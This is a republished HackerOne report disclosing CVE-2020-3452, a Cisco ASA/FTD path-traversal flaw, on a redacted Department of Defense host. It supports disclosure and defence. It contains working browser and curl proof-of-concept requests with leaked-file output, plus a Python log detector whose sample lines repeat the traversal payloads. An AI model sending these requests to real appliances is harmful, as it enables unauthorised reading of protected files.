HackerOne report H1:940384 (hackerone.com), reported by: they
Jul 24, 2020 - 5:12 a.m.

U.S. Dept Of Defense: https://█████ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability

CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS2: 5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

EPSS: 0.975 High
Percentile: 100.0%

Summary:
https://████████ is vulnerable to a Read-Only Path Traversal Vulnerability

Description:
GET request parameters to /+CSCOT+/translation-table and /+CSCOT+/oem-customization are not properly sanitized, which allows reading files within the webroot directory that are not intended to be readable (CVE-2020-3452).

Impact

An unauthenticated, remote attacker can read sensitive files located inside the webroot directory. The traversal is confined to the web services file system: per the Cisco advisory referenced below, it cannot be used to read ASA or FTD system files or files of the underlying operating system.
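
The two endpoints and parameters named above are what a defender looks for in web access logs. The following Python is an added example written for this page, not code from the report or from Cisco; it assumes a constructed Apache/nginx-style combined log format and made-up client addresses, and flags any request to either endpoint whose traversal-bearing parameter (lang or textdomain for translation-table; platform, resource-type or name for oem-customization) contains a ".." component after percent-decoding, including double-encoded variants:

```python
# Added example for this page (not from the HackerOne report or Cisco):
# flag CVE-2020-3452 probes against the two /+CSCOT+/ endpoints in web logs.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint -> query parameters that carry the traversal in the report's PoCs.
VULNERABLE_ENDPOINTS = {
    "/+CSCOT+/translation-table": ("lang", "textdomain"),
    "/+CSCOT+/oem-customization": ("platform", "resource-type", "name"),
}

# A ".." path component: at the start or after a "/", followed by "/" or end.
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")

# Constructed combined-format access log line (Apache/nginx style). ASA's own
# syslog format differs; adapt this regex to whatever you actually collect.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines: the two PoC requests from the report, one benign
# translation-table request, one double-encoded probe, one unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Jul/2020:04:27:46 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 4817
203.0.113.7 - - [24/Jul/2020:04:27:50 +0000] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 200 4817
198.51.100.2 - - [24/Jul/2020:04:28:13 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=AnyConnect&default-language&lang=en HTTP/1.1" 200 2210
198.51.100.5 - - [24/Jul/2020:04:30:22 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=AnyConnect&default-language&lang=%252e%252e%2f HTTP/1.1" 404 0
198.51.100.9 - - [24/Jul/2020:04:31:05 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 9012
"""


def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (%252e -> %2e -> .) before inspecting."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return '<path> <param>=<value>' if the request target looks like a
    CVE-2020-3452 traversal attempt, otherwise None."""
    parts = urlsplit(target)
    path = decode_fully(parts.path)
    params = VULNERABLE_ENDPOINTS.get(path)
    if params is None:
        return None
    # parse_qs already percent-decodes once; decode_fully catches double encoding.
    query = parse_qs(parts.query, keep_blank_values=True)
    for name in params:
        for raw in query.get(name, []):
            value = decode_fully(raw)
            if TRAVERSAL.search(value):
                return f"{path} {name}={value!r}"
    return None


def scan_log(lines):
    """Parse log lines and return one hit per suspicious request."""
    hits = []
    for line in lines:
        match = LOG_LINE.match(line)
        if match is None:
            continue
        reason = classify_request(match["target"])
        if reason:
            hits.append({"src": match["src"], "ts": match["ts"],
                         "status": int(match["status"]), "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{hit['ts']} {hit['src']} status={hit['status']} {hit['reason']}")
```

Feed real proxy or load-balancer logs through scan_log(); ASA's own syslog lines need a different LOG_LINE regex. Matches that returned a non-200 status are still worth an alert, since they show someone probing for the flaw even if that attempt failed.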

Step-by-step Reproduction Instructions

Using Browser

  1. Visit https://██████████/+CSCOT+/translation-table?type=mst&textdomain=/%2BCSCOE%2B/portal_inc.lua&default-language&lang=../ in a browser and note that you are prompted for a file download. The downloaded file is the source code of portal_inc.lua, which is not normally accessible.
  2. To verify you cannot access this file normally, visit https://██████/+CSCOE+/portal_inc.lua and verify that you receive a page that says “Wrong URL”.

Using Curl

  1. In a Linux terminal, send either of the following curl commands (one per vulnerable endpoint):
curl -i -s -k -X $'GET' \
    -H $'Host: ████████' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    $'https://████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'

and

curl -i -s -k -X $'GET' \
    -H $'Host: ████' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    $'https://██████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'

You should receive the following output:

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Fri, 24 Jul 2020 04:27:46 GMT
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains

-- Copyright (C) 2006-2018 by Cisco Systems, Inc.
-- Created by [email protected]

dofile("/+CSCOE+/include/common.lua")
dofile("/+CSCOE+/include/browser_inc.lua")

local function compare(a,b) return a["order"]<b["order"] end;

function INTERNAL_PASSWORD_ENABLED(name)
        return false;

  2. To verify that this file is not normally accessible, run the following curl command:
curl -i -s -k -X $'GET'  \
   -H $'Host: █████' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1'   \
  $'https://███/%2bCSCOE%2b/portal_inc.lua'

You should receive the following output:

HTTP/1.1 500 Internal Error
Cache-Control: no-cache
Pragma: no-cache
Connection: Close
Date: Fri, 24 Jul 2020 04:28:13 GMT
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains

Screenshots in Burp Suite showing the requests succeeding and failing

Success at https://███/+CSCOT+/translation-table?type=mst&textdomain=/%2BCSCOE%2B/portal_inc.lua&default-language&lang=../ which results in disclosure of the source code in portal_inc.lua

█████████

Failure trying to access https://███████/+CSCOE+/portal_inc.lua

███

Suggested Mitigation/Remediation Actions

Upgrade Cisco ASA or Cisco FTD software to a release that contains the fix for CVE-2020-3452 (see the Cisco advisory in the references).

References

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
https://twitter.com/aboul3la/status/1286012324722155525

Impact

CVSS Score: Base 7.5
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MPR:X/MUI:X/MS:X/MC:X/MI:X/MA:X

An unauthenticated, remote attacker can read sensitive files located inside the webroot directory.
